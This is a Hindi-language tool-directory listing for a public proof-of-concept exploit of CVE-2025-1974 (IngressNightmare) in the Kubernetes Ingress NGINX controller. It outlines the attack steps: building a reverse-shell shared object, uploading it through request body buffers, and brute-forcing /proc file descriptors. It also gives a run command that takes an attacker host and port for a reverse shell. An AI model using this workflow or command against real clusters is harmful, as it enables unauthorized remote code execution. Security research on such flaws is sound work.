Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1974 — Ingress RCE के लिए PoC | Kitploit
उपकरण/GitHubGitHub/zwxxb/cve-2025-1974
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षालर्निंग और शिक्षारेड टीमिंग
GitHubzwxxb/cve-2025-1974

CVE-2025-1974

Ingress RCE के लिए PoC

रिपॉजिटरी देखें
8331 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ingress NGINX के लिए एक्सप्लॉइट - IngressNightmare

यह प्रोजेक्ट Kubernetes के लिए Ingress NGINX कंट्रोलर में महत्वपूर्ण अनप्रमाणित रिमोट कोड निष्पादन (RCE) कमजोरियों को लक्षित करने वाला एक एक्सप्लॉइट प्रदान करता है, जिसे सामूहिक रूप से IngressNightmare कहा जाता है।

मूल शोध में, Wiz टीम ने कोई PoC या कार्यात्मक एक्सप्लॉइट प्रदान नहीं किया, इसलिए हमने अपना स्वयं का निर्माण करने और समुदाय के साथ साझा करने का निर्णय लिया।

अवलोकन

Ingress NGINX कंट्रोलर Kubernetes वातावरण में व्यापक रूप से उपयोग किया जाने वाला घटक है, जो क्लस्टर के भीतर सेवाओं तक बाहरी पहुंच का प्रबंधन करता है। हाल की कमजोरियों (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) ने महत्वपूर्ण सुरक्षा जोखिमों को उजागर किया है।

एक्सप्लॉइट वर्कफ़्लो

एक्सप्लॉइट इन मुख्य चरणों का पालन करता है:

शेयर्ड ऑब्जेक्ट जनरेट करें (इंजेक्ट किए गए ssl_engine गुण द्वारा उपयोग): रिवर्स शेल पेलोड वाली .so लाइब्रेरी (evil_engine.so) संकलित करता है।

शेयर्ड ऑब्जेक्ट अपलोड करें: अनुरोध हैंडलिंग (क्लाइंट बॉडी बफ़र्स) का लाभ उठाकर संकलित शेयर्ड ऑब्जेक्ट को इनग्रेस पॉड पर भेजता है। यहाँ ट्रिक कनेक्शन को खुला रखने के लिए सर्वर को एक अलग Content-Length भेजना है।

fd पर ब्रूट-फ़ोर्स: अपलोड की गई वस्तु को संदर्भित करने वाले सही डिस्क्रिप्टर की पहचान करने के लिए प्रक्रिया आईडी और फ़ाइल डिस्क्रिप्टर (/proc/{pid}/fd/{fd}) पर पुनरावृति करता है।

उपयोग

पूर्वापेक्षाएँ:

  • Python 3.x
  • GCC compiler
  • Python requests module

एक्सप्लॉइट चलाएँ:

pip3 install -r requirements.txt

python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/zwxxb/cve-2025-1974/blob/main/attacker_host%3Aport)

Ex: python3 poc.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443

कभी-कभी admission webhook एक अलग नेमस्पेस में होता है। इस मामले में, आपको अंत में नेमस्पेस निर्दिष्ट करने की आवश्यकता है, जैसे kube-system, default, या ingress-nginx।

  • <ingress_url>: लक्ष्य इनग्रेस URL (सार्वजनिक)
  • <admission_webhook_url>: प्रवेश वेबहुक URL (आंतरिक वेबहुक)
  • [attacker_host:port](https://github.com/zwxxb/cve-2025-1974/blob/main/attacker_host%3Aport): रिवर्स शेल के लिए आपका होस्ट और पोर्ट

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना लक्ष्यों के विरुद्ध इस उपकरण का अनधिकृत उपयोग निषिद्ध है। Hakai Security और QuimeraX इस उपकरण के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।

टूल डाउनलोड करें